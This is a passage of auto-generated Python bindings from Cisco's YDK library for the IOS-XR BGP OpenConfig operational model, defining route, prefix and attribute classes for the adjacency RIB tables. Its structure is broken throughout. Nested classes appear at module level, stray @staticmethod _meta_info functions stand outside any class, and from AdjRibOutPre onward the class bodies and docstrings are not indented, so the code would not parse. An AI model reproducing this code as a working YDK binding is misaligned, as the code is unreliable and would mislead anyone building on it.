        # Route all writes through YDK validation of the listed leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
    class ExtCommunity(_Entity_):
        """
        ExtendedCommunityArray
        .. attribute:: objects
        BGP OC objects
        **type**\: str
        **config**\: False
        """
        # Identity of the generating YANG module.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'
        def __init__(self):
            # Python 2/3 compatible base initialization.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
            self.yang_name = "ext-community"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Leaf-only container: no child container classes.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "ext-community"
            # After freezing, attribute writes are routed through __setattr__ below.
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Route all writes through YDK validation of the listed leaf names.
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
        @staticmethod
        def _meta_info():
            # Lazily import the generated meta table and return this class's entry.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
    class UnknownAttributes(_Entity_):
        """
        UnknownAttributes
        .. attribute:: attribute_type
        AttributeType
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: attribute_length
        AttributeLength
        **type**\: int
        **range:** 0..65535
        **config**\: False
        .. attribute:: attribute_value
        Atributevalue
        **type**\: str
        **pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
        **config**\: False
        """
        # Identity of the generating YANG module.
        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'
        def __init__(self):
            # Python 2/3 compatible base initialization.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
            self.yang_name = "unknown-attributes"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Leaf-only container: no child container classes.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
                ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
                ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
            ])
            self.attribute_type = None
            self.attribute_length = None
            self.attribute_value = None
            self._segment_path = lambda: "unknown-attributes"
            # After freezing, attribute writes are routed through __setattr__ below.
            self._is_frozen = True
        def __setattr__(self, name, value):
            # Route all writes through YDK validation of the listed leaf names.
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
        @staticmethod
        def _meta_info():
            # Lazily import the generated meta table and return this class's entry.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
    @staticmethod
    def _meta_info():
        # Lazily import the generated meta table and return this class's entry.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate
    .. attribute:: time_value
    TimeValue
    **type**\: str
    **config**\: False
    """
    # Identity of the generating YANG module.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'
    def __init__(self):
        # Python 2/3 compatible base initialization.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, self).__init__()
        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no child container classes.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        # Relative segment path; the parent entity supplies the ancestor path.
        self._segment_path = lambda: "last-modified-date"
        # After freezing, attribute writes are routed through __setattr__ below.
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all writes through YDK validation of the listed leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)
    @staticmethod
    def _meta_info():
        # Lazily import the generated meta table and return this class's entry.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved
    .. attribute:: time_value
    TimeValue
    **type**\: str
    **config**\: False
    """
    # NOTE: 'Recieved' spelling comes from the YANG model; do not "fix" it,
    # the class name must match the generated meta table key below.
    # Identity of the generating YANG module.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'
    def __init__(self):
        # Python 2/3 compatible base initialization.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, self).__init__()
        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no child container classes.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        # Relative segment path; the parent entity supplies the ancestor path.
        self._segment_path = lambda: "last-update-recieved"
        # After freezing, attribute writes are routed through __setattr__ below.
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all writes through YDK validation of the listed leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
    @staticmethod
    def _meta_info():
        # Lazily import the generated meta table and return this class's entry.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information record for Route."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route']
    return table_entry['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information record for Routes."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes']
    return table_entry['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table
    .. attribute:: num_routes
    NumRoutes
    **type**\: int
    **range:** 0..18446744073709551615
    **config**\: False
    """
    # Identity of the generating YANG module.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'
    def __init__(self):
        # Python 2/3 compatible base initialization.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, self).__init__()
        self.yang_name = "num-routes"
        self.yang_parent_name = "adj-rib-out-post"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Leaf-only container: no child container classes.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        # Relative segment path; the parent entity supplies the ancestor path.
        self._segment_path = lambda: "num-routes"
        # After freezing, attribute writes are routed through __setattr__ below.
        self._is_frozen = True
    def __setattr__(self, name, value):
        # Route all writes through YDK validation of the listed leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes, ['num_routes'], name, value)
    @staticmethod
    def _meta_info():
        # Lazily import the generated meta table and return this class's entry.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    """Return the generated meta-information record for AdjRibOutPost."""
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    table_entry = meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost']
    return table_entry['meta_info']
class AdjRibOutPre(_Entity_):
"""
Adjacency rib out\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Initialize the _Entity_ base in a Python 2/3 compatible way.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre, self).__init__()
    # YANG statement name of this container and of its parent statement.
    self.yang_name = "adj-rib-out-pre"
    self.yang_parent_name = "open-config-neighbor"
    self.is_top_level_class = False
    # An ancestor is a YANG list entry, so an absolute path needs the parent's keys.
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child container classes keyed by their YANG element name.
    self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes))])
    # No leaves on this container, only children.
    self._leafs = OrderedDict()
    # Pre-built child container entities, parented to this node.
    self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes()
    self.routes.parent = self
    self._children_name_map["routes"] = "routes"
    self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes()
    self.num_routes.parent = self
    self._children_name_map["num_routes"] = "num-routes"
    # Relative segment path; the parent entity supplies the ancestor path.
    self._segment_path = lambda: "adj-rib-out-pre"
    # After freezing, attribute writes are routed through __setattr__ below.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route all writes through YDK validation; this container has no settable leaves.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Initialize the _Entity_ base in a Python 2/3 compatible way.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes, self).__init__()
    # YANG statement name of this container and of its parent statement.
    self.yang_name = "routes"
    self.yang_parent_name = "adj-rib-out-pre"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Single child: the 'route' YANG list.
    self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route))])
    # No leaves on this container.
    self._leafs = OrderedDict()
    # 'route' is a YANG list; entries are appended by the caller.
    self.route = YList(self)
    # Relative segment path; the parent entity supplies the ancestor path.
    self._segment_path = lambda: "routes"
    # After freezing, attribute writes are routed through __setattr__ below.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route all writes through YDK validation; this container has no settable leaves.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Initialize the _Entity_ base in a Python 2/3 compatible way.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route, self).__init__()
    # YANG statement name of this list entry and of its parent statement.
    self.yang_name = "route"
    self.yang_parent_name = "routes"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # Keyless operational list: no key leaf names.
    self.ylist_key_names = []
    # Child container classes keyed by their YANG element name.
    self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved))])
    # Leaf metadata; 'route' and 'neighbor_address' are unions of two
    # string patterns (IPv4 and IPv6 forms), hence ['str','str'].
    self._leafs = OrderedDict([
        ('route', (YLeaf(YType.str, 'route'), ['str','str'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
        ('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
        ('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
    ])
    self.route = None
    self.neighbor_address = None
    self.path_id = None
    self.valid_route = None
    self.invalid_reason = None
    self.best_path = None
    # Pre-built child container entities, parented to this node.
    self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName()
    self.prefix_name.parent = self
    self._children_name_map["prefix_name"] = "prefix-name"
    self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList()
    self.route_attr_list.parent = self
    self._children_name_map["route_attr_list"] = "route-attr-list"
    self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList()
    self.ext_attributes_list.parent = self
    self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
    self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate()
    self.last_modified_date.parent = self
    self._children_name_map["last_modified_date"] = "last-modified-date"
    self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved()
    self.last_update_recieved.parent = self
    self._children_name_map["last_update_recieved"] = "last-update-recieved"
    # Relative segment path; the parent entity supplies the ancestor path.
    self._segment_path = lambda: "route"
    # After freezing, attribute writes are routed through __setattr__ below.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route all writes through YDK validation of the listed leaf names.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
    """
    Prefix

    .. attribute:: prefix

        Prefix

        **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix>`

        **config**\: False

    .. attribute:: prefix_length

        Prefix length

        **type**\: int

        **range:** 0..255

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible superclass initialisation (generated idiom).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, self).__init__()
        # Schema identity of this node within the YANG tree.
        self.yang_name = "prefix-name"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers: YANG name -> (python attribute name, binding class).
        self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix))])
        # Leaf descriptors: python name -> (YLeaf, accepted python types).
        self._leafs = OrderedDict([
            ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
        ])
        self.prefix_length = None
        # Eagerly instantiate the child container and link it back to us.
        self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"
        self._segment_path = lambda: "prefix-name"
        # Freeze: from now on __setattr__ validates every assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate post-freeze assignments against the declared leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName, ['prefix_length'], name, value)

    class Prefix(_Entity_):
        """
        Prefix

        .. attribute:: afi

            AFI

            **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`

            **config**\: False

        .. attribute:: ipv4_address

            IPv4 Addr

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: ipv6_address

            IPv6 Addr

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            # Python 2/3 compatible superclass initialisation.
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, self).__init__()
            self.yang_name = "prefix"
            self.yang_parent_name = "prefix-name"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Pure leaf node: no child containers.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "prefix"
            # Freeze: further sets are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import: the meta table is large and only needed on demand.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName.Prefix']['meta_info']

    @staticmethod
    def _meta_info():
        # Lazy import: the meta table is large and only needed on demand.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
    """
    RouteAttributesList

    .. attribute:: next_hop

        NextHopAddress

        **type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop>`

        **config**\: False

    .. attribute:: aggregrator_attributes

        AggregatorList

